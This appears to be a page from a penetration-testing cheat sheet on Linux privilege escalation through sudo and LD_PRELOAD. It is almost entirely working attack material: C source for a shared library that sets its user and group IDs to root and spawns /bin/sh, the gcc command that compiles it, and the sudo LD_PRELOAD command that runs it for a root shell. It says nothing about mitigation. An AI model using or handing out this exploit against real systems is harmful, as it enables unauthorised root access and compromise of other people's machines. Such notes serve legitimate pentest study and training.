sudo+LD_PRELOAD


>>> sudo -l 

>>> cat shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
        unsetenv("LD_PRELOAD");
        setgid(0);
        setuid(0);
        system("/bin/sh");
}

>>> gcc -fPIC -shared -o shell.so shell.c -nostartfiles
>>> sudo LD_PRELOAD=/tmp/shell.so /usr/bin/<what_is_in_your_sudo_-l>




more details : https://c0nd4.medium.com/linux-sudo-ld-preload-privilege-escalation-7e1e17d544ec

PreviousLXD (Group)NextMysql

Last updated 3 years ago